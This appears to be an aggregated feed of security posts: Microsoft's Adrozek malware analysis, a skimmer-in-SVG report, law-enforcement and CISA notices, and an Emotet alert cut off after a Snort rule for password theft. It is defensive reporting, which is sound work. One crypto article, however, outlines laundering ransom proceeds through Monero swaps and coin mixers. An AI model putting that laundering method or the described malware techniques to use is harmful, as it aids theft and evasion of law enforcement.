Implement a strategy to prevent unauthorized data theft, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.
Harden web applications and underlying infrastructure to prevent malicious code injection.
Encrypt card data in transit and at rest to protect customer data from unauthorized use if it is ever compromised.
Establish and maintain offline data backups to assist in rapid recovery should data be lost due to a ransomware attack.
Employ user behavior analytics to identify potential security incidents.
Employ multifactor authentication on all access points into an enterprise network.
Use penetration testing to identify weak points in enterprise networks and vulnerabilities that should be prioritized for patching.
Plan and rehearse incident response procedures for cases of a data breach or ransomware threat.

The post E-Commerce Skimming is the New POS Malware appeared first on Security Intelligence.

A persistent malware campaign has been actively distributing an evolved browser modifier malware at scale since at least May 2020. At its peak in August, the threat was observed on over 30,000 devices every day. The malware is designed to inject ads into search engine results pages. The threat affects multiple browsers—Microsoft Edge, Google Chrome, Yandex Browser, and Mozilla Firefox—exposing the attackers’ intent to reach as many Internet users as possible.

We call this family of browser modifiers Adrozek. If not detected and blocked, Adrozek adds browser extensions, modifies a specific DLL per target browser, and changes browser settings to insert additional, unauthorized ads into web pages, often on top of legitimate ads from search engines. The intended effect is for users, searching for certain keywords, to inadvertently click on these malware-inserted ads, which lead to affiliated pages. The attackers earn through affiliate advertising programs, which pay by amount of traffic referred to sponsored affiliated pages.

Screenshot of search results page on an affected machine and one affected by Adrozed

Figure 1. Comparison of search results pages on an affected machine and one with Adrozek running.

Cybercriminals abusing affiliate programs is not new—browser modifiers are some of the oldest types of threats. However, the fact that this campaign utilizes a piece of malware that affects multiple browsers is an indication of how this threat type continues to be increasingly sophisticated. In addition, the malware maintains persistence and exfiltrates website credentials, exposing affected devices to additional risks.

Such a sustained, far-reaching campaign requires an expansive, dynamic attacker infrastructure. We tracked 159 unique domains, each hosting an average of 17,300 unique URLs, which in turn host more than 15,300 unique, polymorphic malware samples on average. In total, from May to September 2020, we recorded hundreds of thousands of encounters of the Adrozek malware across the globe, with heavy concentration in Europe and in South Asia and Southeast Asia. As this campaign is ongoing, this infrastructure is bound to expand even further.

World map showing volume of devices that have encountered Adrozek

Figure 2. Geographic distribution of Adrozek encounters from May to September 2020.

Effectively protecting against rampant, persistent campaigns like this that incorporate multiple components, polymorphism, and evolved malware behavior requires advanced, behavior-based detection and visibility across the whole attack chain rather than specific components. In this blog, we’ll share our in-depth analysis of this campaign, including the distribution architecture and malware behavior, and provide recommended defenses.

Distribution infrastructure

The Adrozek malware is installed on devices through drive-by download. In our tracking of the Adrozek campaign from May to September 2020, we saw 159 unique domains used to distribute hundreds of thousands of unique malware samples. Attackers relied heavily on polymorphism, which allows attackers to churn huge volumes of samples as well as to evade detection.

While many of the domains hosted tens of thousands of URLs, a few had more than 100,000 unique URLs, with one hosting almost 250,000. This massive infrastructure reflects how determined the attackers are to keep this campaign operational.

Column chart showing number of URLs used in the Adrozek campaign

Figure 3. Number of URLs and number of files hosted on Adrozek domains with at least 100 files.

The distribution infrastructure is also very dynamic. Some of the domains were up for just one day, while others were active for longer, up to 120 days. Interestingly, we saw some of the domains distributing clean files like Process Explorer, likely an attempt by the attackers to improve the reputation of their domains and URLs, and evade network-based protections.

Installation

Attackers use this sprawling infrastructure to distribute hundreds of thousands of unique Adrozek installer samples. Each of these files is heavily obfuscated and uses a unique file name that follows this format: setup_<application name>_<numbers>.exe.

Diagram showing the Adrozek attack chain

Figure 4. Adrozek attack chain

When run, the installer drops an .exe file with a random file name in the %temp% folder. This file in drops the main payload in the Program Files folder using a file name that makes it look like a legitimate audio-related software. We have observed the malware use various names like Audiolava.exe, QuickAudio.exe, and converter.exe. The malware is installed like a usual program that can be accessed through Settings>Apps & features, and registered as a service with the same name.

Screenshot of Apps and features settings showing the installed malware

Figure 5. Adrozek installed as a program that can be accessed through the Apps & features setting

Modifying browser components

Once installed, Adrozek makes multiple changes to the browser settings and components. These changes allow the malware to inject ads into search engine result pages.

Extensions

The malware makes changes to certain browser extensions. On Google Chrome, the malware typically modifies “Chrome Media Router”, one of the browser’s default extensions, but we have seen it use different extensions.

Each extension on Chromium-based browsers has a unique 32-character ID that users can use to locate the extension on machines or on the Chrome Web store. On Microsoft Edge and Yandex Browser, it uses IDs of legitimate extensions, such as “Radioplayer” to masquerade as legitimate. As it is rare for most of these extensions to be already installed on devices, it creates a new folder with this extension ID and stores malicious components in this folder. On Firefox, it appends a folder with a Globally Unique Identifier (GUID) to the browser extension. In summary, the paths and extension IDs used by the malware for each browser are below:

 

Browser
Extension paths examples
Microsoft Edge
%localappdata%MicrosoftEdgeUser DataDefaultExtensionsfcppdfelojakeahklfgkjegnpbgndoch
Google Chrome
%localappdata%GoogleChromeUser DataDefaultExtensionspkedcjkdefgpdelpbcmbmeomcjbeemfm (might vary)
Mozilla Firefox
%appdata%RoamingMozillaFirefoxProfiles<profile>Extensions{14553439-2741-4e9d-b474-784f336f58c9}
Yandex Browser
%localappdata%YandexYandexBrowserUser DataDefaultExtensionsfcppdfelojakeahklfgkjegnpbgndoch

 

Despite targeting different extensions on each browser, the malware adds the same malicious scripts to these extensions. In some cases, the malware modifies the default extension by adding seven JavaScript files and one manifest.json file to the target extension’s file path. In other cases, it creates a new folder with the same malicious components.

Screenshot of File Explorer showing added JavaScript and JSON files

Figure 6. JavaScript and JSON files added to the target extension’s file path

These malicious scripts connect to the attacker’s server to fetch additional scripts, which are responsible for injecting advertisements into search results. The domain name of the remote server is specified in the extension’s scripts. The malware also sends information about the device to the said remote server.

Screenshot of additional downloaded script

Figure 7. Additional downloaded script

Browser DLLs

The malware also tampers with certain browser DLLs. For instance, on Microsoft Edge, it modifies MsEdge.dll to turn off security controls that are crucial for detecting any changes in the Secure Preferences file.

Screenshot of code comparing original and tampered with code

Figure 8. Comparison of original and tampered with MsEdge.dll.

This technique impacts not only Microsoft Edge but other Chromium-based browsers. These browsers store user settings and preferences, such as home page and default search engine, in the Preferences file. For each of the four target browsers, it modifies the relevant DLL:

 

Browser
Modified files
Microsoft Edge
%PROGRAMFILES%MicrosoftEdgeApplication<version>msedge.dll%localappdata%MicrosoftEdgeUser DataDefaultSecure Preferences%localappdata%MicrosoftEdgeUser DataDefaultPreferences
Google Chrome
%PROGRAMFILES%GoogleChromeApplication<version>chrome.dll%localappdata%GoogleChromeUser DataDefaultSecure Preferences%localappdata%GoogleChromeUser DataDefaultPreferences
Yandex Browser
%PROGRAMFILES%YandexYandexBrowser<version>browser.dll%localappdata%YandexYandexBrowserUser DataDefaultSecure Preferences%localappdata%YandexYandexBrowserUser DataDefaultPreferences
Firefox
%PROGRAMFILES%Mozilla Firefoxomni.ja%appdata%MozillaFirefoxProfiles<profile>extensions.json%appdata%MozillaFirefoxProfiles<profile>prefs.js
Browser security settings

Browsers have security settings that defend against malware tampering. The Preferences file, for example, contains sensitive data and security settings. Chromium-based browsers detects any unauthorized modifications to these settings through signatures and validation on several preferences. These preferences, as well as configuration parameters, are stored in JSON file name Secure Preferences.

The Secure Preferences file is similar in structure to the Preferences file except that the former adds hash-based message authentication code (HMAC) for every entry in the file. This file also contains a key named super_mac that verifies the integrity of all HMACs. When the browser starts, it validates the HMAC values and the super_mac key by calculating and comparing with the HMAC SHA-256 of some of the JSON nodes. If it finds values that don’t match, the browser resets the relevant preference to its default value.

In the past, browser modifiers calculated the hashes like browsers do and update the Secure Preferences accordingly. Adrozek goes one step further and patches the function that launches the integrity check. The two-byte patch nullifies the integrity check, which makes the browser potentially more vulnerable to hijacking or tampering.

Two byte patch

Figure 9. Two-byte patch to the function in Secure Preferences file that launches the integrity check

With the integrity check disabled, Adrozek proceeds to modify security settings. On Google Chrome or Microsoft Edge, the malware modifies the following entries in the Secure Preferences file to add permissions that enable the malicious extensions to have more control over Chrome APIs:

 

Entry in Secure Preferences file
Value
Result
browser_action_visible
false
Plugin not visible in the browser toolbar
extension_can_script_all_urls
true
Allows the extension to script on all URLs without explicit permission
incognito
true
The extension can run in the incognito mode
safebrowsing
false
Turns off safe browsing

 

The screenshot below shows the permissions added to the Secure Preferences file:

Screenshot of the secure preferences file showing the added permissions

Figure 10. Permissions added to the Secure Preferences file

On Mozilla Firefox, Adrozek modifies the following security settings:

 

Modified file name
Content
Purpose
prefs.js
user_pref(“app.update.auto”, false);  user_pref(“app.update.enabled”, false);  user_pref(“app.update.service.enabled”, false)
Turn off updates
extensions.json
(appends details about the malicious extension)
Register the extension to the browser
Omni.ja (XPIDatabase.jsm module)
isNewInstall = false
Load the extension
Browser updates

To prevent the browsers from being updated with the latest versions, which could restore modified settings and components, Adrozek adds a policy to turn off updates.

Screenshot of the policy that's added that turns off updates

Figure 11. Policy added to turn off updates

Persistence

In addition to modifying browser setting and components, Adrozek also changes several systems settings to have even more control of the compromised device. It stores its configuration parameters at the registry key HKEY_LOCAL_MACHINESOFTWAREWow6432Node<programName>. The ‘tag’ and ‘did’ entries contain the command-line arguments that it uses to launch the main payload. More recent variants of Adrozek use random characters instead of ‘tag’ or ‘did’.

Screenshot of registry entries added by the malware

Figure 12. Registry entries with command-line arguments that launch the main payload

To maintain persistence, the malware creates a service named “Main Service”.

Screenshot the service added by the malware

Figure 13. Service created to maintain persistence

Ad injection

After tampering with multiple browser components and settings, the malware gains the capability to inject ads on search results on affected browsers. The injection of ads is performed by malicious scripts downloaded from remote servers.

Depending on the search keyword, scripts add related ads at the top of legitimate ads and search results. The number of ads inserted and the sites they point to vary. And while we have not seen these ads point to malware-hosting and other malicious sites, the attackers can presumably make that change anytime. The Adrozek attackers, however, operate the way other browser modifiers do, which is to earn through affiliate ad programs, which pay for referral traffic to certain websites.

Screenshot of search results page on an affected machine and one affected by Adrozed

Figure 14. Comparison of search results pages on an affected machine and one with Adrozek running

Credential theft

On Mozilla Firefox, Adrozek takes things further. It makes the most of its foothold by performing credential theft. It downloads an additional randomly named .exe file, which collects device information and the currently active username. It sends this information to the attacker.

Screenshot of additional executable file created by the malware

Figure 15. Additional executable file written to the %temp% folder

It then starts locating specific files, including login.json. On Mozilla Firefox, the said file, which is located at %appdata%RoamingMozillaFirefox Profiles<profile>logins.json, stores user credentials in encrypted form and the browsing history.

Screenshot of JSON file

Figure 16. JSON file containing stolen credentials

The malware looks for specific keywords like encryptedUsername and encryptedPassword to locate encrypted data. It then decrypts the data using the function PK11SDR_Decrypt() within the Firefox library and sends it to attackers.

With this additional function, Adrozek sets itself apart from other browser modifiers and demonstrates that there’s no such thing as low-priority or non-urgent threats. Preventing the full range of threat from gaining access in the first place is of utmost importance.

Defending against sophisticated browser modifiers

Adrozek shows that even threats that are not thought of as urgent or critical are increasingly becoming more complex. And while the malware’s main goal is to inject ads and refer traffic to certain websites, the attack chain involves sophisticated behavior that allow attackers to gain a strong foothold on a device. The addition of credential theft behavior shows that attackers can expand their objectives to take advantage of the access they’re able to gain.

These complex behaviors, and the fact that the campaign uses polymorphic malware, require protections that focus on identifying and detecting malicious behavior. Microsoft Defender Antivirus, the built-in endpoint protection solution on Windows 10, uses behavior-based, machine learning-powered detections to block Adrozek.

End users who find this threat on their devices are advised to re-install their browsers. Considering the massive infrastructure that was used to distribute this threat on the web, users should also educate themselves about preventing malware infections and the risks of downloading and installing software from untrusted sources and clicking ads or links on suspicious websites. Users should also take advantage of URL filtering solutions, such as Microsoft Defender SmartScreen on Microsoft Edge. Configuring security software to automatically download and install updates, as well as running the latest versions of the operating system and applications and deploying the latest security updates help harden endpoints from threats.

For enterprises, defenders should look to reduce the attack surface for these types of threats. Application control allows organizations to enforce the use of only authorized apps and services. Enterprise-grade browsers like Microsoft Edge provide additional security features like conditional access and Application Guard that defend against threats on the browser.

It’s also important for enterprises to gain deep visibility into malicious behaviors on endpoints and the capability to correlate with threat data from other domains like cloud apps, email and data, and identities. Microsoft 365 Defender delivers coordinated protection across domains and provides rich investigation tools that empower defenders to respond to attacks. Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

 

Microsoft 365 Defender Research Team

 

 

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft 365 Defender tech community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers appeared first on Microsoft Security.

Clever tactic:

This new malware was discovered by researchers at Dutch cyber-security company Sansec that focuses on defending e-commerce websites from digital skimming (also known as Magecart) attacks.

The payment skimmer malware pulls its sleight of hand trick with the help of a double payload structure where the source code of the skimmer script that steals customers’ credit cards will be concealed in a social sharing icon loaded as an HTML ‘svg’ element with a ‘path’ element as a container.

The syntax for hiding the skimmer’s source code as a social media button perfectly mimics an ‘svg’ element named using social media platform names (e.g., facebook_full, twitter_full, instagram_full, youtube_full, pinterest_full, and google_full).

A separate decoder deployed separately somewhere on the e-commerce site’s server is used to extract and execute the code of the hidden credit card stealer.

This tactic increases the chances of avoiding detection even if one of the two malware components is found since the malware loader is not necessarily stored within the same location as the skimmer payload and their true purpose might evade superficial analysis.

frog_and_butterfly.jpg

With government money printers going brrr extra hard during the Covid-19 pandemic, people are newly reminded of the fraud that is fiat. The latest crypto bull run is creating fear of missing out among malware peddlers as well. Brace yourself for the next round of mining malware and crypto ransomware.

The last crypto bull run in 2017 saw an increase in utility of crypto currency for malicious actors. Crypto coins for popular crypto currency come into existence through so called mining. The mining process requires computational power. Mining allows a compromised machine to turn profits regardless of who it belongs to and what its business function is. There is no specific need to target security critical, well protected hosts and no further movement in the network of a compromised host is required, creating a low bar of entry for hackers seeking to generate mining profits. Otherwise unattractive hosts running old, unpatched software, handling “boring” data from a hacker’s perspective, can become worth compromising with rising crypto prices.

Another way to obtain coins is through extortion. Possible ways to gain leverage on a person or company would be to obtain sensitive information which they need to keep confidential or to threaten business critical infrastructure. Examples for suitable attack angles on infrastructure include wide scale encryption of data or classical network-based denial of service.

How it Works

When a miner mines a valid block, they receive a block reward. The block prepared by a miner, contains the miner’s address to which the block reward will be sent. Small miners do not have the resources to reliably mine blocks on their own. That’s why they join mining pools which distribute received block rewards to the participants based on their contribution.

In case of extortion, the victim is given an address to which to send crypto funds to. In the past, the acts of obtaining and sending crypto with all its unknowns and difficulties posed a significant obstacle to people and companies alike. Comparable to purchases of any kind, the easier it is to pull the trigger and conclude a payment, the more likely a person is to make a purchase. This is purely an UX problem which is continuously improving. Nowadays it is fairly straight-forward to obtain the crypto funds needed to pay a ransom.

Countermeasures

Assuming the attacker’s leverage is too great to not pay ransom or the illegal mining operation has already been ongoing for quite some time, what options present themselves to entities such as law enforcement after a transaction has taken place? One possibility is to follow the money. Bitcoin, for example, is very transparent when it comes to transaction flow. The sender, recipient and amount of all Bitcoin transactions are publicly available in the blockchain. Thus, any Bitcoin transaction can be traced if either the sender or recipient address is known. In case of extortion, the address is of course known. If mining malware is used, it can be reverse engineered to find the address to which mined Bitcoin are sent. If the address belongs to a mining pool, it can be pressured to reveal the payout address for the people who registered the machines found to be running the mining malware. It may not be possible to link the address, where the illegally obtained Bitcoin accumulated, to the people controlling them. A Bitcoin address is essentially a public/private key pair. The public key does not inherently divulge any information about the holder of the private key, i.e. the person who controls the Bitcoin at that address.

At some point, actors will want to use their crypto coins in real world purchases. If, for example, a car is purchased with the tainted Bitcoin, the Bitcoin transaction is visible on the blockchain. Whoever goes to either pick up the car or the car is delivered to, will at least be placed under great suspicion by law enforcement.

Purchasing goods directly in crypto is not widely possible yet, so for the time being, a conversion to fiat needs to take place. Various challenges can arise after converting crypto to government-controlled money and these are outside of this article’s scope. The conversion can be done with anyone who wants to purchase crypto for fiat, but commonly takes place on centralized crypto exchanges. These provide a marketplace where buyers and sellers meet and support even fairly large volumes. The daily trade volume of a top 5 crypto exchange ranges between 1 and 3 billion USD. To trade on a centralized crypto exchange, the crypto needs to be transferred to an exchange-controlled address, i.e. the owner loses custody of his crypto. The exchange is a choke point on which law enforcement can exert pressure for funds to be seized. Furthermore, trading significant amounts requires prior user identification, also called KYC (Know Your Customer).

There are also decentralized exchanges, which essentially only do order book matching and where users do not lose custody of their assets and don not need to go through a KYC process. These work in a variety of ways. At the time of writing, they are slower and more expensive than centralized exchanges. The conversion to fiat is also not straight-forward and requires purchasing USD-backed tokens called stable coins. The topic of decentralized exchanges goes beyond the scope of this article and is not further elaborated upon here.

Essentially, the problems with illegally obtained crypto are currently similar to those already faced by any entity handling substantial amounts of illicit funds in fiat.

Laundering the Crypto

A viable method to cover one’s tracks is to change to another crypto currency. Not all crypto currencies share Bitcoin’s transaction flow transparency. Monero for example, is specifically designed with privacy in mind. Illegally obtained Bitcoin can be converted to Monero at various exchange services without any registration. A common workflow is to supply the desired currency and address, in our case Monero and deposit the Bitcoin to an address designated by the exchange service. These often operate out of countries which do not pressure them to implement KYC. Liquidity can however be an issue with these. In any case, small amounts can be exchanged at a time to avoid larger losses and conversions can be spread out across a number of such exchange sites to avoid liquidity problems. Once in the Monero world, the money is squeaky clean. The Monero blockchain obscures the sender, the amount, and the recipient of transactions. From here Monero can be converted back to any other crypto currency or sold for fiat at a centralized exchange where the identity of the malicious actor is known.

Another way of obfuscating coin origins is through coin mixers, also called tumblers. Multiple participants typically inject the same amount of crypto into the tumbler, after which these inputs are mixed and redistributed to new addresses. This cuts the linkage between input and output addresses. This can be implemented in a zero-trust fashion, where no participant has to trust either the mixer or any other participant with the Chaumian CoinJoin. Mixing with the Chaumian CoinJoin is conveniently implemented in the Wasabi wallet. Depending on the taint level of the coins to be mixed and one’s moral disposition, a drawback could be that less dirty coins, gained from mining malware for example, are mixed with coins associated with much dirtier activity such as human trafficking or child pornography. The practice of multiple consecutive coin mixes can alleviate the coin taint problem by further ambiguating all mixed coin’s origins.

Conclusion

With the upcoming crypto bull run the profitability of the attacks described above is bound to increase. Security controls should be considered and/or be put in place to mitigate this threat.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

twitterbitacora.png

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Andy Greenberg from Wired wrote an article, “How 30 lines of code blew up a 27-ton generator,” about the March 3, 2007 Aurora demonstration. Aurora is not a malware event, but rather a gap in protection of the electric grid. That is, Aurora is a protective relay problem not a malware issue so there were NO lines of code that damaged the 27-ton generator. Aurora needs to be addressed quickly as it can be caused by any competent power system protection engineer and the information is publicly available.

flag.png

Original release date: October 29, 2020

Content: The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Defense (DOD) Cyber National Mission Force (CNMF) have identified a malware variant—referred to as Zebrocy—used by a sophisticated cyber actor. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10310246r1.v1 and U.S. Cyber Command’s VirusTotal page for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: October 29, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense Cyber National Mission Force (CNMF) have identified a malware variant—referred to as ComRAT—used by the Russian-sponsored advanced persistent threat (APT) actor Turla. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10310246-2.v1 and U.S. Cyber Command’s VirusTotal page for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

Original release date: October 6, 2020Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC).

Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.

To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.

Technical Details

Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]).The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (Brute Force: Password Guessing [T1110.001], Valid Accounts: Local Accounts [T1078.003], Remote Services: SMB/Windows Admin Shares [T1021.002]).

Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.

Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved HTTP POST requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (Application Layer Protocol: Web Protocols [T1071.001]).

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR

Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (Exploitation of Remote Services [T1210]). Figure 1 lays out Emotet’s use of enterprise techniques.

 

Figure 1: MITRE ATT&CK enterprise techniques used by Emotet

 

Timeline of Activity

The following timeline identifies key Emotet activity observed in 2020.

February: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[1] July: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[2] August:

Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[3]  
Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included:
Emotet delivering Qbot affiliate partner01 as the primary payload and
The Emotet mail sending module’s ability to deliver benign and malicious attachments.[4]

CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.

September:

Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[5],[6],[7],[8] Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to “view” the documents—an action which actually enables the delivery of malware.[9] Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain—using a spoofed identity—and attaching a malicious document to trick recipients into opening the file.[10]

MITRE ATT&CK Techniques

According to MITRE, Emotet uses the ATT&CK techniques listed in table 1.

Table 1: Common exploit tools

Technique

Use

OS Credential Dumping: LSASS Memory [T1003.001]

Emotet has been observed dropping password grabber modules including Mimikatz.

Remote Services: SMB/Windows Admin Shares [T1021.002]

Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced.

Obfuscated Files or Information [T1027]

Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, cmd.exe arguments, and PowerShell scripts.

Obfuscated Files or Information: Software Packing [T1027.002]

Emotet has used custom packers to protect its payloads.

Network Sniffing [T1040]

Emotet has been observed to hook network APIs to monitor network traffic.

Exfiltration Over C2 Channel [T1041]

Emotet has been seen exfiltrating system information stored within cookies sent within a HTTP GET request back to its command and control (C2) servers.

Windows Management Instrumentation [T1047]

Emotet has used WMI to execute powershell.exe.

Process Injection: Dynamic-link Library Injection [T1055.001]

Emotet has been observed injecting in to Explorer.exe and other processes.

Process Discovery [T1057]

Emotet has been observed enumerating local processes.

Command and Scripting Interpreter: PowerShell [T1059.001]

Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

Emotet has used cmd.exe to run a PowerShell script.

Command and Scripting Interpreter: Visual Basic [T1059.005]

Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.

Valid Accounts: Local Accounts [T1078.003]

Emotet can brute force a local admin password, then use it to facilitate lateral movement.

Account Discovery: Email Account [T1087.003]

Emotet has been observed leveraging a module that can scrape email addresses from Outlook.

Brute Force: Password Guessing [T1110.001]

Emotet has been observed using a hard-coded list of passwords to brute force user accounts.

Email Collection: Local Email Collection [T1114.001]

Emotet has been observed leveraging a module that scrapes email data from Outlook.

User Execution: Malicious Link [T1204.001]

Emotet has relied upon users clicking on a malicious link delivered through spearphishing.

User Execution: Malicious File [T1204.002]

Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.

Exploitation of Remote Services [T1210]

Emotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE (MS17-010) to achieve lateral movement and propagation.

Create or Modify System Process: Windows Service [T1543.003]

Emotet has been observed creating new services to maintain persistence.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun key to maintain persistence.

Scheduled Task/Job: Scheduled Task [T1053.005]

Emotet has maintained persistence through a scheduled task.

Unsecured Credentials: Credentials In Files [T1552.001]

Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Emotet has been observed dropping browser password grabber modules.

Archive Collected Data [T1560]

Emotet has been observed encrypting the data it collects before sending it to the C2 server.

Phishing: Spearphishing Attachment [T1566.001]

Emotet has been delivered by phishing emails containing attachments.

Phishing: Spearphishing Link [T1566.002]

Emotet has been delivered by phishing emails containing links.

Non-Standard Port [T1571]

Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/Hypertext Transfer Protocol Secure.

Encrypted Channel: Asymmetric Cryptography [T1573.002]

Emotet is known to use RSA keys for encrypting C2 traffic.

Detection

Signatures

MS-ISAC developed the following Snort signature for use in detecting network activity associated with Emotet activity.

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:”[CIS] Emotet C2 Traffic Using Form Data to Send Passwords”; content:”POST”; http_method; content:”Content-Type|3a 20|multipart/form-data|3b 20|boundary=”; http_header; fast_pattern; content:”Content-Disposition|3a 20|form-data|3b 20|name=|22|”; http_client_body; content:!”——WebKitFormBoundary”; http_client_body; content:!”Cookie|3a|”; pcre:”/:?(chrome|firefox|safari|opera|ie|edge) passwords/i”; reference:url,cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/; sid:1; rev:2;)

CISA developed the following Snort signatures for use in detecting network activity associated with Emotet activity. Note: Uniform Resource Identifiers should contain a random length alphabetical multiple directory string, and activity will likely be over ports 80, 8080, or 443.

